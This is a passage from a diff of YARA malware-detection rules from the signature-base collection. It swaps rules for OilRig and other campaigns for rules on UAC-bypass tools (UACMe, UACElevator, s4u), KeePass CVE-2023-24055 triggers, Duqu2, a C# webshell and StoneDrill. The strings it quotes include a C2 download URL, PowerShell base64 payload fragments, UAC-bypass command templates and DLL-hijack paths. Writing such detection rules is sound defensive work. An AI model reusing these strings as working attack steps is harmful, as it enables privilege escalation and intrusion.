+		description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7867e65-567f-530f-83d4-b5126021e523"
-		date = "2015-02-28"
+		id = "7979129e-99a3-522a-8285-9061e1e2bd41"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/WXUQcP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_scanbox_deeppanda.yar#L2-L34"
+		reference = "https://github.com/hfiref0x/UACME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L35-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f521d3f000fb39e5e3b08657e75219e93fb3bb8ffbbdbd70f471928a56bef27"
-		score = 75
+		logic_hash = "e10f39837a53dcc6d301d21a69fca965aeca0a07cfc832a9a0142b08d280f955"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
-		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
-		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+		hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
+		hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
 
 	strings:
-		$s0 = "http://142.91.76.134/p.dat" fullword ascii
-		$s1 = "HttpDump 1.1" fullword ascii
-		$s3 = "SecureInput .exe" fullword wide
-		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
-		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
-		$s6 = "ServiceMaix" fullword ascii
-		$x1 = "Management Support Team1" fullword ascii
-		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
-		$x3 = "SEOUL1" fullword ascii
+		$x1 = "UACMe injected, Fubuki at your service." wide fullword
+		$x3 = "%temp%\\Hibiki.dll" fullword wide
+		$x4 = "[UCM] Cannot write to the target process memory." fullword wide
+		$s1 = "%systemroot%\\system32\\cmd.exe" wide
+		$s2 = "D:(A;;GA;;;WD)" wide
+		$s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
+		$s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
+		$s5 = "Fubuki.dll" ascii fullword
+		$l1 = "ntdll.dll" ascii
+		$l2 = "Cabinet.dll" ascii
+		$l3 = "GetProcessHeap" ascii
+		$l4 = "WriteProcessMemory" ascii
+		$l5 = "ShellExecuteEx" ascii
 
 	condition:
-		(1 of ( $s* ) and 2 of ( $x* ) ) or ( 3 of ( $x* ) )
+		(1 of ( $x* ) ) or ( 3 of ( $s* ) and all of ( $l* ) )
 }
-rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_1A53B0Cp32E46G0Qio7 : FILE
+rule SIGNATURE_BASE_Uacelevator : FILE
 {
 	meta:
-		description = "Detects Inocnation Malware"
-		author = "Fidelis Cybersecurity"
-		id = "1f2250b7-fee4-5031-aeba-90d35319b560"
-		date = "2016-02-15"
+		description = "UACElevator bypassing UAC - file UACElevator.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "629b1a92-726d-5713-ae3d-74cc8a1e52ad"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_inocnation.yar#L1-L30"
+		reference = "https://github.com/MalwareTech/UACElevator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L66-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "824997d8c8845838420f226b60de544f33a50327fa67aea472de6eaf1b6b4492"
+		hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
+		logic_hash = "8215746b2c84a5500221580969fb2eac8ee11cbb5af4ba5bf2dbd1def65b8745"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
-		hash2 = "d9821468315ccd3b9ea03161566ef18e"
-		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 }
-		$s2 = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 }
-		$s3 = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
-		$s4 = { 66 [4-7] 14 40 83 f8 14 7c ?? }
-		$s5 = { 66 [4-7] 56 40 83 f8 2d 7c ?? }
-		$s6 = { 66 [4-7] 20 40 83 f8 1a 7c ?? }
-		$s7 = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? }
-		$s8 = "%08x%08x%08x%08x" wide ascii
-		$s9 = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii
+		$x1 = "\\UACElevator.pdb" ascii
+		$s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
+		$s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
+		$s3 = "Infection module: %s" fullword ascii
+		$s4 = "Could not save module to %s" fullword ascii
+		$s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
+		$s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
+		$s7 = "Stack around the variable '" fullword ascii
+		$s8 = "MSVCR120D.dll" fullword wide
+		$s9 = "Address: 0x" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Oilrig_Strings_Oct17 : FILE
+rule SIGNATURE_BASE_S4U : FILE
 {
 	meta:
-		description = "Detects strings from OilRig malware and malicious scripts"
+		description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edf7c7ca-0c58-5507-8d99-83078ff8947a"
-		date = "2017-10-18"
-		modified = "2022-12-21"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L11-L28"
+		id = "0d746311-56fe-538c-946c-3a3dd1603adc"
+		date = "2015-06-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/aurel26/s-4-u-for-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L92-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3987fa1ccb215edeb0d36c947fd6d7a24847ea854d3f355d1aef4b000f55e710"
-		score = 75
+		hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
+		logic_hash = "b1882710f2514fb44ff01631636c0a66beef620c8bea644ebe05cd5385a9e494"
+		score = 50
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii
+		$x1 = "\\Release\\s4u.pdb" ascii
+		$s0 = "CreateProcessAsUser failed (error %u)." fullword ascii
+		$s1 = "GetTokenInformation failed (error: %u)." fullword ascii
+		$s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii
+		$s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii
+		$s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii
+		$s5 = "The token does not have the specified privilege (%S)." fullword ascii
+		$s6 = "Unable to parse command line." fullword ascii
+		$s7 = "Unable to find logon SID." fullword ascii
+		$s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
+		$s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii
+		$g1 = "%systemroot%\\system32\\cmd.exe" wide
+		$g2 = "SeTcbPrivilege" wide
+		$g3 = "winsta0\\default" wide
+		$g4 = ".rsrc"
+		$g5 = "HeapAlloc"
+		$g6 = "GetCurrentProcess"
+		$g7 = "HeapFree"
+		$g8 = "GetProcessHeap"
+		$g9 = "ExpandEnvironmentStrings"
+		$g10 = "ConvertStringSidToSid"
+		$g11 = "LookupPrivilegeValue"
+		$g12 = "AllocateLocallyUniqueId"
+		$g13 = "ADVAPI32.dll"
+		$g14 = "LsaLookupAuthenticationPackage"
+		$g15 = "Secur32.dll"
+		$g16 = "MSVCR120.dll"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $g* ) )
+}
+rule SIGNATURE_BASE_UACME_Akagi_2 : FILE
+{
+	meta:
+		description = "Detects Windows User Account Control Bypass - from files Akagi32.exe, Akagi64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1177d663-1081-5d17-9dd7-1218d95d90f7"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/hfiref0x/UACME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L151-L174"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "f79a82d466f51c86a0e6fb89688708c35dbcc7ba8f4543e5fb7565d41dd3faab"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca"
+		hash2 = "609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5"
 
 	strings:
-		$x1 = "%localappdata%\\srvHealth.exe" fullword wide ascii
-		$x2 = "%localappdata%\\srvBS.txt" fullword wide ascii
-		$x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" ascii
-		$x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" ascii
-		$s3 = ".LoadDll(\"Run\", arg, \"C:\\\\Windows\\\\" ascii
+		$x1 = "Usage: Akagi.exe [Method] [OptionalParamToExecute]" fullword wide
+		$x2 = "[UCM] Target file already exists, abort" fullword wide
+		$s1 = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword wide
+		$s2 = "Akagi.exe" fullword wide
+		$s3 = "Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" fullword wide
+		$s4 = "/c wusa %ws /extract:%%windir%%\\system32\\sysprep" fullword wide
+		$s5 = "/c wusa %ws /extract:%%windir%%\\system32\\migwiz" fullword wide
+		$s6 = "loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"" fullword ascii
 
 	condition:
-		filesize < 800KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples1 : FILE
+rule SIGNATURE_BASE_EXPL_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects suspicious entries in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
 		author = "Florian Roth (Nextron Systems)"
-		id = "237fe7af-a2ab-51ae-bc96-3af46b08622a"
-		date = "2017-10-18"
+		id = "2c031919-da19-5fd0-b21a-2e83679ad1e3"
+		date = "2023-01-25"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L42-L61"
+		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_keepass_cve_2023_24055.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7e659440e3abc7355f2e21ea8f63cfb7b17b5715e4575bdccf9d646ed47db20"
+		logic_hash = "3ca00f317838819bb7fb80c9d00d94db498e1d3ef146b9af2664dae09302a86d"
 		score = 75
+		quality = 81
+		tags = "CVE-2023-24055, FILE"
+
+	strings:
+		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
+		$x1 = "<Parameter>KeePass XML (2.x)</Parameter>"
+		$x2 = "::ReadAllBytes("
+		$x3 = " -Method "
+		$x4 = " bypass "
+		$x5 = "powershell" nocase ascii wide fullword
+
+	condition:
+		filesize < 200KB and $a1 and 1 of ( $x* )
+}
+rule SIGNATURE_BASE_SUSP_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
+{
+	meta:
+		description = "Detects suspicious triggers defined in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ff1a93f-f7f0-528d-9e07-402e321a0ffe"
+		date = "2023-01-25"
+		modified = "2023-12-05"
+		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_keepass_cve_2023_24055.yar#L22-L37"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "4ed3eee86baf3dddfe423795491a5a94c02df3f4a7525efa6f2436e19197e55b"
+		score = 60
+		quality = 85
+		tags = "CVE-2023-24055, FILE"
+
+	strings:
+		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
+		$s1 = "<Action>" ascii wide
+		$s2 = "<Parameter>" ascii wide
+
+	condition:
+		filesize < 200KB and $a1 and all of ( $s* )
+}
+rule SIGNATURE_BASE_Duqu2_Sample1 : FILE
+{
+	meta:
+		description = "Detects malware - Duqu2 (cross-matches with IronTiger malware and Derusbi)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39ba04f1-df45-5513-ab8f-12097a79cdc7"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L10-L28"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "bf6b60bcae2b41487ede11581c82b32e6bc912445008b1655e4f75be65cf6596"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc"
-		hash2 = "0ccb2117c34e3045a4d2c0d193f1963c8c0e8566617ed0a561546c932d1a5c0c"
+		hash1 = "6b146e3a59025d7085127b552494e8aaf76450a19c249bfed0b4c09f328e564f"
+		hash2 = "8e97c371633d285cd8fc842f4582705052a9409149ee67d97de545030787a192"
+		hash3 = "2796a119171328e91648a73d95eb297edc220e8768f4bbba5fb7237122a988fc"
+		hash4 = "5559fcc93eef38a1c22db66a3e0f9e9f026c99e741cc8b1a4980d166f2696188"
 
 	strings:
-		$s1 = "###$$$TVqQAAMAAAAEAAAA" ascii
-		$s2 = "C:\\Users\\J-Win-7-32-Vm\\Desktop\\error.jpg" fullword wide
-		$s3 = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes(" ascii
-		$s4 = " /c echo powershell > " fullword wide ascii
-		$s5 = "\\Libraries\\servicereset.exe" wide
-		$s6 = "%DestFolder%" fullword wide ascii
+		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
+		$s2 = "MSI.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples2 : FILE
+rule SIGNATURE_BASE_Duqu2_Sample2 : FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects Duqu2 Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08771b23-1d0e-5da7-b42c-005ed257e2d1"
-		date = "2017-10-18"
+		id = "a32f54a3-8656-5592-ac40-17330bfca319"
+		date = "2016-07-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L63-L82"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad00c7293f61f1b5528c3eea0dc32c10d40aeacc194be84a7f64d19b069f1add"
-		score = 75
+		logic_hash = "6afd87d472929f56272eb6f28970f2c8be5eb08e6126287391aee1269de1100d"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4"
-		hash2 = "33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647"
+		hash1 = "d12cd9490fd75e192ea053a05e869ed2f3f9748bf1563e6e496e7153fb4e6c98"
+		hash2 = "5ba187106567e8d036edd5ddb6763f89774c158d2a571e15d76572d8604c22a0"
+		hash3 = "6e09e1a4f56ea736ff21ad5e188845615b57e1a5168f4bdaebe7ddc634912de9"
+		hash4 = "c16410c49dc40a371be22773f420b7dd3cfd4d8205cf39909ad9a6f26f55718e"
+		hash5 = "2ecb26021d21fcef3d8bba63de0c888499110a2b78e4caa6fa07a2b27d87f71b"
+		hash6 = "2c9c3ddd4d93e687eb095444cef7668b21636b364bff55de953bdd1df40071da"
 
 	strings:
-		$x1 = "PolicyConverter.exe" fullword wide
-		$x2 = "SrvHealth.exe" fullword wide
-		$x3 = "srvBS.txt" fullword wide
-		$s1 = "{a3538ba3-5cf7-43f0-bc0e-9b53a98e1643}, PublicKeyToken=3e56350693f7355e" fullword wide
-		$s2 = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe" fullword wide
+		$s1 = "=<=Q=W=a=g=p=v=|=" fullword ascii
+		$s2 = ">#>(>.>3>=>]>d>p>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 2 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* )
 }
+rule SIGNATURE_BASE_Duqu2_Sample3 : FILE
+{
+	meta:
+		description = "Detects Duqu2 Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c558445f-fbe3-57db-80f7-09a87b097921"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L52-L66"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "4adaf71a4acd8ce122af0b6f1267dc34c5190efcb4a6fa3322c1e6cf67a546a5"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
 
-rule SIGNATURE_BASE_Oilrig_Ismagent_Campaign_Samples3 : FILE
+	strings:
+		$s1 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1 )
+}
+rule SIGNATURE_BASE_Duqu2_Sample4 : FILE
 {
 	meta:
-		description = "Detects OilRig malware from Unit 42 report in October 2017"
+		description = "Detects Duqu2 Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e26510bd-d183-566a-a185-ebed7a81401c"
-		date = "2017-10-18"
+		id = "8c5ca68d-762c-5d2e-8d37-f58dc66bcae2"
+		date = "2016-07-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JQVfFP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_oct17.yar#L84-L116"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L68-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4984cf33e7b0e0dae264ed11caae6cfab9db2a6047a46ec41c28b5637b4589b"
+		logic_hash = "ddecd1d7fa007b83fe6e29ac8983d02511a89a16ab2365f8086ec92a52d4bf33"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3536df7379660d931256b3cf49be810c0d931c3957c464d75e4cba78ba3b92e3"
+
+	strings:
+		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
+		$s2 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
+		$s3 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
+		$s4 = "ProcessUserAccounts" fullword ascii
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) ) or ( all of them )
+}
+rule SIGNATURE_BASE_Duqu2_Uas : FILE
+{
+	meta:
+		description = "Detects Duqu2 Executable based on the specific UAs in the file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d82f6351-fab0-5324-850f-dd40a172fceb"
+		date = "2016-07-02"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L86-L104"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "8bf27ca851c580080514dfa886c0d7c69ac114efb5dbc35ccd1e7686c3dd44b1"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "52fe506928b0262f10de31e783af8540b6a0b232b15749d647847488acd0e17a"
+		hash2 = "81cdbe905392155a1ba8b687a02e65d611b60aac938e470a76ef518e8cffd74d"
+
+	strings:
+		$x1 = "Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1" fullword wide
+		$x2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7xs5D9rRDFpg2g" fullword wide
+		$x3 = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" fullword wide
+		$x4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2" fullword wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+}
+rule SIGNATURE_BASE_WEBSHELL_Csharp_Hash_String_Oct22 : FILE
+{
+	meta:
+		description = "C# webshell using specific hash check for the password."
+		author = "Nils Kuhnert (modified by Florian Roth)"
+		id = "c7d459be-5e61-57b7-b738-051c0cec62d2"
+		date = "2022-10-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshell_csharp.yar#L2-L25"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "29c187ad46d3059dc25d5f0958e0e8789fb2a51b9daaf90ea27f001b1a9a603c"
+		logic_hash = "28a07f3dd17fc469388867fa82a0e21abeee9c4e114af245b684535e4e194891"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$gen1 = "void Page_Load" ascii
+		$gen2 = "FromBase64String" ascii
+		$gen3 = "CryptoServiceProvider" ascii
+		$gen4 = "ComputeHash" ascii
+		$hashing1 = "BitConverter.ToString(" ascii
+		$hashing2 = ").Replace(\"-\", \"\") == \"" ascii
+		$filter1 = "BitConverter.ToString((" ascii
+
+	condition:
+		filesize < 10KB and all of ( $gen* ) and all of ( $hashing* ) and not 1 of ( $filter* )
+}
+
+rule SIGNATURE_BASE_Susp_File_Enumerator_With_Encrypted_Resource_101 : FILE
+{
+	meta:
+		description = "Generic detection for samples that enumerate files with encrypted resource called 101"
+		author = "Kaspersky Lab"
+		id = "9bc16ec2-c94c-54f5-b09c-88a78e9e3fb2"
+		date = "2026-01-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L12-L41"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
+		hash = "c843046e54b755ec63ccb09d0a689674"
+		logic_hash = "0a207038b3cbba88d05cd6a053fd14337ac1fbb08b2a532b542ee2bb6b881a5a"
+		score = 65
+		quality = 44
+		tags = "FILE"
+
+	strings:
+		$mz = "This program cannot be run in DOS mode."
+		$a1 = "FindFirstFile" ascii wide nocase
+		$a2 = "FindNextFile" ascii wide nocase
+		$a3 = "FindResource" ascii wide nocase
+		$a4 = "LoadResource" ascii wide nocase
+
+	condition:
